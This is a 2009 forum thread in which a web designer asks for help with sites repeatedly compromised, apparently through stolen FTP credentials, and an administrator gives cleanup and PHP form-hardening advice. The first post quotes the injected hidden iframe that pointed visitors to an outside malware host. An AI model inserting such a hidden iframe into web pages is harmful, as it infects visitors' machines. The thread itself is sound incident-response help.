Author Topic: Very Frustrated...Websites Compromised  (Read 54059 times)

0 Members and 1 Guest are viewing this topic.

July 12, 2009, 02:10:49 pm
Read 54059 times

#41baby

  • Jr. Member

  • Offline
  • **

  • 14
Hello,

I have been having problems with several websites I design/maintain.  We thought the issue was dealt with 3 months ago but it keeps coming back.  The following appears in any page named INDEX:

Code: [Select]
<iframe src="h[i]tt[/i]p://a3h.ru:8080/ts/in.cgi?pepsi82" width=125 height=125 style="visibility: hidden"></iframe>
It causes a virus to be downloaded.

I have done everything the internet has suggested:  malware scans, virus scans, updating all my programs and I just requested new passwords for each server (I should have it by Monday).  I woke up this morning and the sites were again nailed with the virus.

I read on this list, it could have something to do with PHP code.  Could it be my form code?  I have one PHP and one that is flash with PHP that I got off the net.

If anyone here can help me out, that would be greatly appreciated.

After I get my password change (and I removed the FTP program's storage of the information), what should I do?

Thanks,

DN

MysteryFCM: Embedded HTML in BBCode tags

July 12, 2009, 02:40:33 pm
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Theres 4 main things you need to do;

1. Check your sites files (ALL of the files) for malicious code
2. Check no shells were uploaded
3. Change the FTP passwords
4. Change any web based passwords for the site

This should ALL be done from a known clean machine (i.e. not the machine you usually use).

If you've got a backup of the sites files, you can skip #1, and just delete ALL of the files currently on the server, and replace them with the backups.

If your site uses a database, this will need to be checked aswell.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 12, 2009, 03:02:23 pm
Reply #2

#41baby

  • Jr. Member

  • Offline
  • **

  • 14
Hello,

Thanks for the reply.

Questions from your answers:

1. Check your sites files (ALL of the files) for malicious code:  the code keeps appearing and re-appearing.  What I usually do is delete it from the server and upload the one from my computer which does not have it.  Then, after 2 months (or in this case a couple days lately), it reappears.  They only seem to attach the INDEX.HTML pages.    

2. Check no shells were uploaded:  I have no idea what you mean by this.  Can you tell me how to check for "shells".

3. Change the FTP passwords:  In the works.

4. Change any web based passwords for the site:  I do have any.

5.  This should ALL be done from a known clean machine (i.e. not the machine you usually use). If you've got a backup of the sites files, you can skip #1, and just delete ALL of the files currently on the server, and replace them with the backups:  This is always the part I get really confused.  The website files from my computer are always clean.  They get infected once I put them online.  I have checked them many times and they are clean.  So, I just have to burn them to a disk, bring them to say, my lap-top (which I never used for uploading to the server before) and upload them?

6. If your site uses a database:  I just have a basic package from www.namesecure.com.  Not sure if it has a database.  I do not think so.

Thanks for your answers and I look forward to clarifying what you already said.

DN

July 12, 2009, 03:05:35 pm
Reply #3

CM_MWR

  • Special Members
  • Hero Member

  • Offline
  • *

  • 319
These frames were/are being inserted via compromised FTP last I heard, be sure the machine your using to make changes from isnt compromised as well, Ive found that to be the case more than once.

July 12, 2009, 03:08:33 pm
Reply #4

#41baby

  • Jr. Member

  • Offline
  • **

  • 14
Hello,

These frames were/are being inserted via compromised FTP last I heard, be sure the machine your using to make changes from isnt compromised as well, Ive found that to be the case more than once.

Two (more) Questions:

1 - Any suggestions for checking my computer.  I have done SEVERAL different scans and methods.  Any suggestions would be appreciated.  Perhaps I missed something.   

2 - In terms of using another computer to upload:  so I can never use my actually computer again?  What if I need to change something on my website?  My lap-top does not have the programs. 

Thanks,

DN

July 12, 2009, 03:15:33 pm
Reply #5

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Shells allow the attacker to compromise the site, even after the passwords are changed, as they can then do whatever they want via an HTTP interface. You can identify these by going through the files on the server, and deleting any that shouldn't be there (you can identify what shouldn't be there by checking your backups)

You can use your usual machine again, once you're sure it's clean. Without knowing which programs you've already tried, I can only suggest programs to use;

a-Squared
www.emsisoft.com

Malwarebytes AntiMalware
www.malwarebytes.org

ClamWin
www.clamwin.com

Kaspersky
www.kaspersky.com

Quote
the code keeps appearing and re-appearing.  What I usually do is delete it from the server and upload the one from my computer which does not have it.  Then, after 2 months (or in this case a couple days lately), it reappears.  They only seem to attach the INDEX.HTML pages.

If you've not changed the FTP password yet, it won't matter how many times you replace the files, especially if this is how they got in - it will keep happening until the FTP password is changed (this should've been the first thing to have been done)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 12, 2009, 03:17:29 pm
Reply #6

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
As an aside, if you would like help verifying your machine is clean, please see the following;

http://temerc.com/forums/viewtopic.php?f=12&t=18
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 12, 2009, 03:30:22 pm
Reply #7

#41baby

  • Jr. Member

  • Offline
  • **

  • 14
Hello,

Thanks.

I will get my changed passwords hopefully on Monday.

I will then go through everything you have suggested.

I appreciate the help and will post again if it comes up again.

DN

July 12, 2009, 04:05:41 pm
Reply #8

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
No problem ..... if you require further help, please do not hesitate to pop back :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 12, 2009, 05:19:06 pm
Reply #9

#41baby

  • Jr. Member

  • Offline
  • **

  • 14
Hello,

I do have one more question.  I have noticed during my investigations on these viruses that it could be the PHP code of forms.  I have also noticed that one "under construction" site I have, the virus acted different.  That site got nailed with the virus but does NOT have the PHP form code, the virus is there in the code but does not activate.

Below is the code for my FLASH/PHP form.

I was wondering if there might be something that could be improved.

Thanks,

DN

---

Code: [Select]
<?php
$contact_name 
$_POST['name'];
$contact_email $_POST['email'];
$contact_subject $_POST['subject'];
$contact_message $_POST['message'];

if( 
$contact_name == true )
{
$sender $contact_email;
$receiver "MY EMAIL ADDRESS";
$client_ip $_SERVER['REMOTE_ADDR'];
$email_body "Name: $contact_name \nEmail: $sender \nSubject: $contact_subject \nMessage: $contact_message \nIP: $client_ip";
$extra "From: $sender\r\n" "Reply-To: $sender \r\n" "X-Mailer: PHP/" phpversion();

if( mail$receiver"Flash Contact Form - $subject"$email_body$extra ) ) 
{
echo "success=yes";
}
else
{
echo "success=no";
}
}
?>

MysteryFCM: Embedded code in BBCode tags

July 12, 2009, 05:32:42 pm
Reply #10

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Change;

Code: [Select]
$contact_name = $_POST['name'];
$contact_email = $_POST['email'];
$contact_subject = $_POST['subject'];
$contact_message = $_POST['message'];

if( $contact_name == true )

To;

Code: [Select]
$contact_name = $_POST['name']; $contact_name=stripslashes(htmlspecialchars($contact_name, ENT_QUOTES));
$contact_email = $_POST['email']; if(strpos($contact_email, "@")==false){die('E-mail invalid');}
$contact_email = stripslashes(htmlspecialchars($contact_email, ENT_QUOTES));
$contact_subject = $_POST['subject']; $contact_subject=stripslashes(htmlspecialchars($contact_subject, ENT_QUOTES));
$contact_message = $_POST['message']; $contact_message=stripslashes(htmlspecialchars($contact_message, ENT_QUOTES));

if(isset($_POST['email']) && isset($_POST['message']))

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 12, 2009, 05:35:23 pm
Reply #11

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
I also wrote a spambot filter that you may want to consider adding to your forms;

http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool

There's a vanilla PHP mod at;

http://forum.hosts-file.net/viewtopic.php?f=69&t=1597
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 12, 2009, 05:49:49 pm
Reply #12

#41baby

  • Jr. Member

  • Offline
  • **

  • 14
Hello,

I cannot express how much I appreciate this.

Should I change it and upload AFTER the new passwords are in place?

I was thinking, I could delete the entire website and upload my backups after I do a double check of my computer.  I know none of web pages on my computer are effected.  Still, the virus could be on my computer.  I will get it checked using ALL the methods you mentioned above.

Thanks,

DN

July 12, 2009, 06:05:29 pm
Reply #13

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
If you've got a backup, even better. This will save you having to identify shells and manually remove malicious code. However, this should only be done AFTER;

1. FTP passwords are changed
2. Your machine is confirmed as clean (unless of course, you do this from a secondary machine known to be clean)
3. ALL files currently on your sites FTP server are deleted

Again, I must stress, if this is done before the passwords are changed and before the machine is confirmed as clean, there is nothing preventing this happening again.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 12, 2009, 06:09:43 pm
Reply #14

#41baby

  • Jr. Member

  • Offline
  • **

  • 14
Hello,

I checked my website's server and I do not see any files I do not recognize.  Every file that is on the server, that is on my computer is clean. 

I will follow your instructions to the letter.

Thank you,

Derek